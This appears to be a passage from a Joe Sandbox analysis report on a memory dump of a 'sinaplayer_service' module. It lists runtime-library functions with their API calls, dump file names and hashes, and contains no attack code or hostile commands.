                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalDeleteSection$Free__crtfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2230536912-0
                                                                                                                                                                                                    • Opcode ID: 15a2b398757a3fc5e916cb55c3a3f80e41c086d220438ad96c5c47f3e71a260d
                                                                                                                                                                                                    • Instruction ID: c444ea5f4bb809b85d3a5a18b97210b97cf1bfd69b7a3b7e7978e777bd6cc4d5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15a2b398757a3fc5e916cb55c3a3f80e41c086d220438ad96c5c47f3e71a260d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DF022B6401203CBEB100B19A98872B77AABB42235B31422AED7493194CF788482CED0
                                                                                                                                                                                                    Function 6D092C8B Relevance: 6.0, APIs: 4, Instructions: 39COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _getptd.MSVCR120(6D092CF0,0000000C), ref: 6D092C9B
                                                                                                                                                                                                    • _lock.MSVCR120(0000000C,6D092CF0,0000000C), ref: 6D092CB3
                                                                                                                                                                                                      • Part of subcall function 6D08EDD7: EnterCriticalSection.KERNEL32(?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D08EDF3
                                                                                                                                                                                                      • Part of subcall function 6D092D0C: _unlock.MSVCR120(0000000C,6D092CDF,0000000C), ref: 6D092D0E
                                                                                                                                                                                                    • _getptd.MSVCR120(6D092CF0,0000000C), ref: 6D0DF3D2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$CriticalEnterSection_lock_unlock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2319614578-0
                                                                                                                                                                                                    • Opcode ID: 1c6cf50b61f7f2e9497d9cd594b50ce08b08ffc705c5b1812e80edbfd7205184
                                                                                                                                                                                                    • Instruction ID: f856c20d488ab415ef85ad4eea57ab06fd6bbd7886720e7a8f8183540b93e8aa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c6cf50b61f7f2e9497d9cd594b50ce08b08ffc705c5b1812e80edbfd7205184
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E601F472D49305DBFB219BB48800B2E37B46F04329F92818AEA24AF2C1CB749805DB40
                                                                                                                                                                                                    Function 6D0AFDBC Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,?,?,?,?,?,6D0AFE20,0000000C), ref: 6D0AFDEA
                                                                                                                                                                                                      • Part of subcall function 6D094B96: _lock.MSVCR120(?), ref: 6D094BC1
                                                                                                                                                                                                    • _fseek_nolock.MSVCR120(?,?,?,?,?,?,?,?,?,6D0AFE20,0000000C), ref: 6D0AFDF9
                                                                                                                                                                                                      • Part of subcall function 6D0AFE3C: _fileno.MSVCR120(?,?,?,?,?,?,?,6D0AFDFE,?,?,?), ref: 6D0AFE82
                                                                                                                                                                                                      • Part of subcall function 6D0AFE3C: _lseek.MSVCR120(00000000,?,?,?,?,?,?,6D0AFDFE,?,?,?), ref: 6D0AFE89
                                                                                                                                                                                                      • Part of subcall function 6D0AFDB4: _unlock_file.MSVCR120(?,6D0AFE12), ref: 6D0AFDB5
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,6D0AFE20,0000000C), ref: 6D0D5676
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,6D0AFE20,0000000C), ref: 6D0D5681
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_fileno_fseek_nolock_invalid_parameter_noinfo_lock_lock_file_lseek_unlock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4149153117-0
                                                                                                                                                                                                    • Opcode ID: 3a6a5c98dddf361ea4a724bc6cb609be69299700bfab8eb53cb0c9e550a56089
                                                                                                                                                                                                    • Instruction ID: 29b4ec51fa3a09c829f22001a9b9bbecc4ef30a35cfd9a642e50b29810991b28
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a6a5c98dddf361ea4a724bc6cb609be69299700bfab8eb53cb0c9e550a56089
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18F0C832D05305A7FB12DFB4C80476E3AA5AF82368F178205E5349F2D2DB3489019B52
                                                                                                                                                                                                    Function 6D0AF80E Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,?,?,?,?,?,6D0AF878,0000000C), ref: 6D0AF83D
                                                                                                                                                                                                    • _fwrite_nolock.MSVCR120(?,00000000,00000000,?,?,?,?,?,?,?,6D0AF878,0000000C), ref: 6D0AF851
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fwrite_nolock_lock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3764063476-0
                                                                                                                                                                                                    • Opcode ID: 69e664e8fcfa2bb92856a0cec816c2a0433c646cee8aecfb12702cbd0d84a591
                                                                                                                                                                                                    • Instruction ID: b232bdc1e2fe21f59157259b846211b94d6921569e80f22f077ca6a15909f752
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69e664e8fcfa2bb92856a0cec816c2a0433c646cee8aecfb12702cbd0d84a591
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAF0AF31944206EBFF129FA5CC007BE3AA4FF00368F5A8014F924AF192DB788644DF51
                                                                                                                                                                                                    Function 6D0EED00 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Variance.LIBCMT ref: 6D0EED20
                                                                                                                                                                                                    • _CIsqrt.MSVCR120(00000000), ref: 6D0EED25
                                                                                                                                                                                                    • _CIsqrt.MSVCR120(00000000), ref: 6D0EED36
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Mean.LIBCMT ref: 6D0EED43
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Climbing::Concurrency::details::HillHistory::IsqrtMeasured$MeanVariance
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4254205323-0
                                                                                                                                                                                                    • Opcode ID: 4e910e7d1ec1138b0225cdd4a7f3fce465b19a785c238e9d560ff16037f57310
                                                                                                                                                                                                    • Instruction ID: 3d9ffd24849e843d242a1a4ea2b0d94b306472d4798f7dba5bec1809fad02593
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e910e7d1ec1138b0225cdd4a7f3fce465b19a785c238e9d560ff16037f57310
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17F09030C0850DDAEF00AFA4D6502EDBB78EF45391F614591D981E7240CB31496187EA
                                                                                                                                                                                                    Function 6D08EDD7 Relevance: 6.0, APIs: 4, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D08EDF3
                                                                                                                                                                                                    • __amsg_exit.LIBCMT(00000011,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0D3BBA
                                                                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 6D0D3BC9
                                                                                                                                                                                                    • _errno.MSVCR120(6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0D3BDC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalEnterSection__amsg_exit_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4121137658-0
                                                                                                                                                                                                    • Opcode ID: 6cee19ca4122ba138bca76a6e0b56bb6643b92e14cb75a604c1cf639c8bde56c
                                                                                                                                                                                                    • Instruction ID: 18a3660217e15844c8864ce704e2327132a8b143250fda09ae5547dd351278ed
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cee19ca4122ba138bca76a6e0b56bb6643b92e14cb75a604c1cf639c8bde56c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3F0A73518C30AB6FA411768A804B9D37685F0B375F925027EB10DB0D2DFB5D0415566
                                                                                                                                                                                                    Function 6D094F9E Relevance: 6.0, APIs: 4, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,?,6D094FF8,0000000C), ref: 6D094FCD
                                                                                                                                                                                                      • Part of subcall function 6D094B96: _lock.MSVCR120(?), ref: 6D094BC1
                                                                                                                                                                                                    • _fclose_nolock.MSVCR120(?,?,?,6D094FF8,0000000C), ref: 6D094FD8
                                                                                                                                                                                                      • Part of subcall function 6D094F4C: __freebuf.LIBCMT ref: 6D094F6E
                                                                                                                                                                                                      • Part of subcall function 6D094F4C: _fileno.MSVCR120(?,?,?), ref: 6D094F74
                                                                                                                                                                                                      • Part of subcall function 6D094F4C: _close.MSVCR120(00000000,?,?,?), ref: 6D094F7A
                                                                                                                                                                                                      • Part of subcall function 6D095014: _unlock_file.MSVCR120(?,6D094FEF,?,?,6D094FF8,0000000C), ref: 6D095015
                                                                                                                                                                                                    • _errno.MSVCR120(6D094FF8,0000000C), ref: 6D0D541D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D094FF8,0000000C), ref: 6D0D5428
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __freebuf_close_errno_fclose_nolock_fileno_invalid_parameter_noinfo_lock_lock_file_unlock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1403730806-0
                                                                                                                                                                                                    • Opcode ID: a1f294b2f99de5afc44b47a67e66fe517b5cc6ad1db2eea3706e774931890d12
                                                                                                                                                                                                    • Instruction ID: 5071f8cd7230af640c0bb466a99b9a9592cfc4b217980a5c9d3a94a0e72f5028
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1f294b2f99de5afc44b47a67e66fe517b5cc6ad1db2eea3706e774931890d12
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AF02431C08702AAFB019B66C800B6F76E06F45339F129249DA349F1E0CB3CC541AF5A
                                                                                                                                                                                                    Function 6D0F5BFC Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0F5C03
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000004,6D0FAE4B), ref: 6D0F5C11
                                                                                                                                                                                                    • List.LIBCMT ref: 6D0F5C38
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?), ref: 6D0F5C4F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterH_prolog3LeaveList
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 850592863-0
                                                                                                                                                                                                    • Opcode ID: f1e7db0c8560da6b441cb618eff643c6da1fccb961e1b0b585361c7063d7967b
                                                                                                                                                                                                    • Instruction ID: 00bac4adcc4e2b9c2e9d012e890780d561cc30049b8152bed0f4394223eccfe7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1e7db0c8560da6b441cb618eff643c6da1fccb961e1b0b585361c7063d7967b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE01AF75611102DFEB08CF60C988BEDBB75FF49310B154195EA629B296C770EA26CB90
                                                                                                                                                                                                    Function 6D0F00FB Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0F0102
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000008,6D0EC84E), ref: 6D0F0114
                                                                                                                                                                                                      • Part of subcall function 6D0EC9DA: TlsSetValue.KERNEL32(?,?), ref: 6D0ECA00
                                                                                                                                                                                                      • Part of subcall function 6D0EC9DA: GetCurrentThread.KERNEL32 ref: 6D0ECA35
                                                                                                                                                                                                      • Part of subcall function 6D0EC9DA: Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCMT ref: 6D0ECA48
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6D0F014E
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 6D0F015D
                                                                                                                                                                                                      • Part of subcall function 6D0F0245: Concurrency::details::SchedulerProxy::AdjustAllocationIncrease.LIBCMT ref: 6D0F0296
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::CriticalProxy::SchedulerSection$AdjustAllocationCoreCurrentDecrementEnterEventH_prolog3IncreaseLeaveSubscriptionThreadValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 779242910-0
                                                                                                                                                                                                    • Opcode ID: 0017290117e162c949524765f3aa57a6f4d2127512cd71fb4fce708ff2215a18
                                                                                                                                                                                                    • Instruction ID: 4ea760ba65d36fb5dc12df6b3fef3d04ab60335160b6a4dad6b12e4754ab87c1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0017290117e162c949524765f3aa57a6f4d2127512cd71fb4fce708ff2215a18
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AF0C230918255DBFF01DF60C9483BE7B71BF4234AF204058D9556F14ACBB58A06CB92
                                                                                                                                                                                                    Function 6D0ECDCD Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0ECDD4
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000004,6D0ECB35), ref: 6D0ECDF9
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000004,6D0ECB35), ref: 6D0ECE10
                                                                                                                                                                                                    • Concurrency::details::ContextBase::~ContextBase.LIBCMT ref: 6D0ECE36
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseContextHandle$BaseBase::~Concurrency::details::H_prolog3
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 256686745-0
                                                                                                                                                                                                    • Opcode ID: 4f021b0872290df00cbc870e0e97649f8597e1d9f48749a3fa2f2124ae5312d7
                                                                                                                                                                                                    • Instruction ID: c7d3834b9709f44a4f224841ccbb8c9eb9a08916584a63b749b6dafe8c18ce6f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f021b0872290df00cbc870e0e97649f8597e1d9f48749a3fa2f2124ae5312d7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96F030B4B05301DFFB249FB5958477ABBE8BF49640F41081D9AAACB341DBB0E440DB96
                                                                                                                                                                                                    Function 6D09C6DD Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfomemmove
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 351588475-0
                                                                                                                                                                                                    • Opcode ID: bb6bcc0fa1ff81361605226a01bf269187570ccc8fff8f92234ccfeaf79458d5
                                                                                                                                                                                                    • Instruction ID: 79c7325fd22b29ce0d2d64b9fb0ea69c6d231bd7bb98a280cd5d1452bf0b1d32
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb6bcc0fa1ff81361605226a01bf269187570ccc8fff8f92234ccfeaf79458d5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0BF0303124830AAAFF115E68DC00BEF7BACEB0A745F414026BA149A190D775C590EBF6
                                                                                                                                                                                                    Function 6D0AF9DE Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,?,?,?,?,?,6D0AFA30,0000000C), ref: 6D0AFA01
                                                                                                                                                                                                      • Part of subcall function 6D094B96: _lock.MSVCR120(?), ref: 6D094BC1
                                                                                                                                                                                                    • _ftell_nolock.MSVCR120(?,?,?,?,?,?,?,6D0AFA30,0000000C), ref: 6D0AFA0C
                                                                                                                                                                                                      • Part of subcall function 6D0AFA4C: _fileno.MSVCR120(?,?,?,?,?,6D0AFA11,?,?,?,?,?,?,?,6D0AFA30,0000000C), ref: 6D0AFA78
                                                                                                                                                                                                      • Part of subcall function 6D0AFA4C: _lseek.MSVCR120(00000000,00000000,00000001,?,?,?,?,6D0AFA11,?,?,?,?,?,?,?,6D0AFA30), ref: 6D0AFA95
                                                                                                                                                                                                      • Part of subcall function 6D0AF9D6: _unlock_file.MSVCR120(?,6D0AFA23,?,?,?,?,?,?,6D0AFA30,0000000C), ref: 6D0AF9D7
